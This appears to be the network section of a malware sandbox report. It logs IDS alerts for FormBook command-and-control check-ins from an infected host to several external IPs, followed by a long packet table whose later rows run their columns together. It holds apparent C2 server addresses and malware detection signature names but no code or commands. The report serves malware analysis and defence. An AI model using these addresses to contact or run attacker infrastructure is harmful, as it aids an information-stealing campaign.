2024-12-09T06:58:56.729532+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 50001 | 77.68.64.45 | 80 | TCP
2024-12-09T06:59:04.694321+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50002 | 146.88.233.115 | 80 | TCP
2024-12-09T06:59:07.117800+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50003 | 146.88.233.115 | 80 | TCP
2024-12-09T06:59:09.805906+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50004 | 146.88.233.115 | 80 | TCP
2024-12-09T06:59:12.456335+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 50005 | 146.88.233.115 | 80 | TCP
2024-12-09T06:59:19.595436+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50006 | 217.160.0.200 | 80 | TCP
2024-12-09T06:59:22.289922+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50007 | 217.160.0.200 | 80 | TCP
2024-12-09T06:59:25.010391+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50008 | 217.160.0.200 | 80 | TCP
2024-12-09T06:59:27.583945+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 50009 | 217.160.0.200 | 80 | TCP
2024-12-09T06:59:34.246688+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50010 | 13.248.169.48 | 80 | TCP
2024-12-09T06:59:36.899515+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50011 | 13.248.169.48 | 80 | TCP
2024-12-09T06:59:39.564180+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50012 | 13.248.169.48 | 80 | TCP
2024-12-09T06:59:42.233654+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 50013 | 13.248.169.48 | 80 | TCP
2024-12-09T06:59:54.311479+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50014 | 81.2.196.19 | 80 | TCP
2024-12-09T06:59:56.969568+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50015 | 81.2.196.19 | 80 | TCP
2024-12-09T06:59:59.706100+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50016 | 81.2.196.19 | 80 | TCP
2024-12-09T07:00:02.298681+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 50017 | 81.2.196.19 | 80 | TCP
2024-12-09T07:00:14.169395+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50018 | 172.67.215.235 | 80 | TCP
2024-12-09T07:00:16.710060+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50019 | 172.67.215.235 | 80 | TCP
2024-12-09T07:00:19.390029+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50020 | 172.67.215.235 | 80 | TCP
2024-12-09T07:00:22.050641+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 50021 | 172.67.215.235 | 80 | TCP
2024-12-09T07:00:28.970978+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50022 | 172.67.145.234 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 9, 2024 06:56:57.469186068 CET | 49766 | 80 | 192.168.2.7 | 85.159.66.93
Dec 9, 2024 06:56:57.588820934 CET | 80 | 49766 | 85.159.66.93 | 192.168.2.7
Dec 9, 2024 06:56:57.589106083 CET | 49766 | 80 | 192.168.2.7 | 85.159.66.93
Dec 9, 2024 06:56:57.600594997 CET | 49766 | 80 | 192.168.2.7 | 85.159.66.93
Dec 9, 2024 06:56:57.719938993 CET | 80 | 49766 | 85.159.66.93 | 192.168.2.7
Dec 9, 2024 06:56:58.918168068 CET | 80 | 49766 | 85.159.66.93 | 192.168.2.7
Dec 9, 2024 06:56:58.918265104 CET | 80 | 49766 | 85.159.66.93 | 192.168.2.7
Dec 9, 2024 06:56:58.918320894 CET | 49766 | 80 | 192.168.2.7 | 85.159.66.93
Dec 9, 2024 06:56:58.921864033 CET | 49766 | 80 | 192.168.2.7 | 85.159.66.93
Dec 9, 2024 06:56:59.041238070 CET | 80 | 49766 | 85.159.66.93 | 192.168.2.7
Dec 9, 2024 06:57:14.424127102 CET | 49805 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:14.543855906 CET | 80 | 49805 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:14.543970108 CET | 49805 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:14.559535027 CET | 49805 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:14.680629969 CET | 80 | 49805 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:15.822072029 CET | 80 | 49805 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:15.822108030 CET | 80 | 49805 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:15.822186947 CET | 49805 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:15.822228909 CET | 80 | 49805 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:15.823726892 CET | 49805 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:16.069725037 CET | 49805 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:17.088164091 CET | 49811 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:17.207597971 CET | 80 | 49811 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:17.207700968 CET | 49811 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:17.223403931 CET | 49811 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:17.342914104 CET | 80 | 49811 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:18.480420113 CET | 80 | 49811 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:18.480447054 CET | 80 | 49811 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:18.480474949 CET | 80 | 49811 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:18.480510950 CET | 49811 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:18.480510950 CET | 49811 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:18.725341082 CET | 49811 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:19.744509935 CET | 49820 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:19.863832951 CET | 80 | 49820 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:19.863945961 CET | 49820 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:19.878730059 CET | 49820 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:19.998119116 CET | 80 | 49820 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:19.998143911 CET | 80 | 49820 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:21.145694971 CET | 80 | 49820 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:21.145733118 CET | 80 | 49820 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:21.145822048 CET | 49820 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:21.148466110 CET | 80 | 49820 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:21.148515940 CET | 49820 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:21.381894112 CET | 49820 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:22.400794983 CET | 49829 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:22.520114899 CET | 80 | 49829 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:22.520236969 CET | 49829 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:22.529239893 CET | 49829 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:22.648479939 CET | 80 | 49829 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:23.798679113 CET | 80 | 49829 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:23.798736095 CET | 80 | 49829 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:23.798877954 CET | 49829 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:23.799168110 CET | 80 | 49829 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:23.799226046 CET | 49829 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:23.801923037 CET | 49829 | 80 | 192.168.2.7 | 104.21.62.184
Dec 9, 2024 06:57:23.921300888 CET | 80 | 49829 | 104.21.62.184 | 192.168.2.7
Dec 9, 2024 06:57:29.626789093 CET | 49845 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:29.746042013 CET | 80 | 49845 | 85.25.177.138 | 192.168.2.7
Dec 9, 2024 06:57:29.746112108 CET | 49845 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:29.762391090 CET | 49845 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:29.881700993 CET | 80 | 49845 | 85.25.177.138 | 192.168.2.7
Dec 9, 2024 06:57:31.028702021 CET | 80 | 49845 | 85.25.177.138 | 192.168.2.7
Dec 9, 2024 06:57:31.029352903 CET | 80 | 49845 | 85.25.177.138 | 192.168.2.7
Dec 9, 2024 06:57:31.029390097 CET | 49845 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:31.272361040 CET | 49845 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:32.290904045 CET | 49851 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:32.411253929 CET | 80 | 49851 | 85.25.177.138 | 192.168.2.7
Dec 9, 2024 06:57:32.411380053 CET | 49851 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:32.428884983 CET | 49851 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:32.548190117 CET | 80 | 49851 | 85.25.177.138 | 192.168.2.7
Dec 9, 2024 06:57:33.693114042 CET | 80 | 49851 | 85.25.177.138 | 192.168.2.7
Dec 9, 2024 06:57:33.693571091 CET | 80 | 49851 | 85.25.177.138 | 192.168.2.7
Dec 9, 2024 06:57:33.693662882 CET | 49851 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:33.944204092 CET | 49851 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:34.962954998 CET | 49861 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:35.082180023 CET | 80 | 49861 | 85.25.177.138 | 192.168.2.7
Dec 9, 2024 06:57:35.082283974 CET | 49861 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:35.097094059 CET | 49861 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:35.216391087 CET | 80 | 49861 | 85.25.177.138 | 192.168.2.7
Dec 9, 2024 06:57:35.216532946 CET | 80 | 49861 | 85.25.177.138 | 192.168.2.7
Dec 9, 2024 06:57:36.367711067 CET | 80 | 49861 | 85.25.177.138 | 192.168.2.7
Dec 9, 2024 06:57:36.368172884 CET | 80 | 49861 | 85.25.177.138 | 192.168.2.7
Dec 9, 2024 06:57:36.368289948 CET | 49861 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:36.600577116 CET | 49861 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:37.619931936 CET | 49868 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:37.739183903 CET | 80 | 49868 | 85.25.177.138 | 192.168.2.7
Dec 9, 2024 06:57:37.739480972 CET | 49868 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:37.748908997 CET | 49868 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:37.868268013 CET | 80 | 49868 | 85.25.177.138 | 192.168.2.7
Dec 9, 2024 06:57:39.032749891 CET | 80 | 49868 | 85.25.177.138 | 192.168.2.7
Dec 9, 2024 06:57:39.033449888 CET | 80 | 49868 | 85.25.177.138 | 192.168.2.7
Dec 9, 2024 06:57:39.033503056 CET | 49868 | 80 | 192.168.2.7 | 85.25.177.138
Dec 9, 2024 06:57:39.035875082 CET | 49868 | 80 | 192.168.2.7 | 85.25.177.138
                                                                                  Dec 9, 2024 06:57:39.155069113 CET804986885.25.177.138192.168.2.7
                                                                                  Dec 9, 2024 06:58:01.844461918 CET4992380192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:01.963877916 CET8049923173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:01.963974953 CET4992380192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:01.984894991 CET4992380192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:02.106012106 CET8049923173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:03.076719999 CET8049923173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:03.077564001 CET8049923173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:03.079876900 CET4992380192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:03.491265059 CET4992380192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:04.511780024 CET4992980192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:04.631115913 CET8049929173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:04.631191969 CET4992980192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:04.655942917 CET4992980192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:04.775336981 CET8049929173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:05.808597088 CET8049929173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:05.808614969 CET8049929173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:05.808685064 CET4992980192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:06.163342953 CET4992980192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:07.185519934 CET4993680192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:07.304888010 CET8049936173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:07.305762053 CET4993680192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:07.321552038 CET4993680192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:07.440845966 CET8049936173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:07.440927029 CET8049936173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:08.416271925 CET8049936173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:08.417161942 CET8049936173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:08.417207956 CET4993680192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:08.835055113 CET4993680192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:09.854559898 CET4994580192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:09.973989010 CET8049945173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:09.974071026 CET4994580192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:09.988408089 CET4994580192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:10.107884884 CET8049945173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:11.095673084 CET8049945173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:11.096092939 CET8049945173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:11.096549034 CET4994580192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:11.099600077 CET4994580192.168.2.7173.236.199.97
                                                                                  Dec 9, 2024 06:58:11.218801022 CET8049945173.236.199.97192.168.2.7
                                                                                  Dec 9, 2024 06:58:16.874321938 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:16.993545055 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:16.993690014 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:17.011692047 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:17.130954027 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.241955042 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.241981983 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.241996050 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.242014885 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.242103100 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.242117882 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.242136002 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.242146015 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.242153883 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.242166996 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.242172003 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.242178917 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.242202997 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.245033979 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.245083094 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.361330986 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.361355066 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.361392975 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.365489006 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.365590096 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.365633011 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.436738014 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.436813116 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.436857939 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.439419031 CET8049962203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:18.439460993 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:18.522615910 CET4996280192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:19.545566082 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:19.664870024 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:19.665679932 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:19.680959940 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:19.800364971 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897641897 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897675991 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897687912 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897701979 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897713900 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897810936 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897826910 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897896051 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:20.897927999 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897945881 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897948027 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:20.897959948 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:20.897977114 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:20.898016930 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:21.017460108 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:21.017499924 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:21.021528006 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:21.021576881 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:21.071903944 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:21.089500904 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:21.089534998 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:21.092156887 CET8049968203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:21.092217922 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:21.099603891 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:21.197587967 CET4996880192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:22.214802027 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:22.334183931 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:22.334270954 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:22.353539944 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:22.473123074 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:22.473140001 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583564997 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583623886 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583637953 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583739996 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583751917 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583762884 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583775997 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:23.583800077 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583811045 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:23.583815098 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583879948 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.583906889 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:23.584009886 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.584115028 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:23.703191042 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.703237057 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.707307100 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.707360029 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:23.757602930 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:23.775511980 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.775584936 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.778218031 CET8049974203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:23.778249979 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:23.785609961 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:23.869602919 CET4997480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:24.894171000 CET4998480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:25.014885902 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:25.021647930 CET4998480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:25.029637098 CET4998480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:25.148929119 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.256148100 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.256181955 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.256195068 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.256247044 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.256263971 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.256275892 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.256366968 CET4998480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:26.256393909 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.256406069 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.256429911 CET4998480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:26.256448030 CET4998480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:26.256462097 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.256474018 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.256504059 CET4998480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:26.375915051 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.375983000 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.376100063 CET4998480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:26.380194902 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.428896904 CET4998480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:26.448170900 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.448190928 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.448358059 CET4998480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:26.450570107 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:26.450659990 CET4998480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:26.501151085 CET4998480192.168.2.7203.161.42.73
                                                                                  Dec 9, 2024 06:58:26.620352030 CET8049984203.161.42.73192.168.2.7
                                                                                  Dec 9, 2024 06:58:32.287861109 CET4999480192.168.2.746.30.211.38
                                                                                  Dec 9, 2024 06:58:32.407135963 CET804999446.30.211.38192.168.2.7
                                                                                  Dec 9, 2024 06:58:32.407216072 CET4999480192.168.2.746.30.211.38
                                                                                  Dec 9, 2024 06:58:32.425932884 CET4999480192.168.2.746.30.211.38
                                                                                  Dec 9, 2024 06:58:32.545236111 CET804999446.30.211.38192.168.2.7
                                                                                  Dec 9, 2024 06:58:33.669060946 CET804999446.30.211.38192.168.2.7
                                                                                  Dec 9, 2024 06:58:33.671653986 CET804999446.30.211.38192.168.2.7
                                                                                  Dec 9, 2024 06:58:33.671905041 CET4999480192.168.2.746.30.211.38
                                                                                  Dec 9, 2024 06:58:33.929054022 CET4999480192.168.2.746.30.211.38
                                                                                  Dec 9, 2024 06:58:34.952850103 CET4999580192.168.2.746.30.211.38
                                                                                  Dec 9, 2024 06:58:35.072221041 CET804999546.30.211.38192.168.2.7
                                                                                  Dec 9, 2024 06:58:35.077660084 CET4999580192.168.2.746.30.211.38
                                                                                  Dec 9, 2024 06:58:35.089653015 CET4999580192.168.2.746.30.211.38
                                                                                  Dec 9, 2024 06:58:35.208934069 CET804999546.30.211.38192.168.2.7
                                                                                  Dec 9, 2024 06:58:36.369287014 CET804999546.30.211.38192.168.2.7
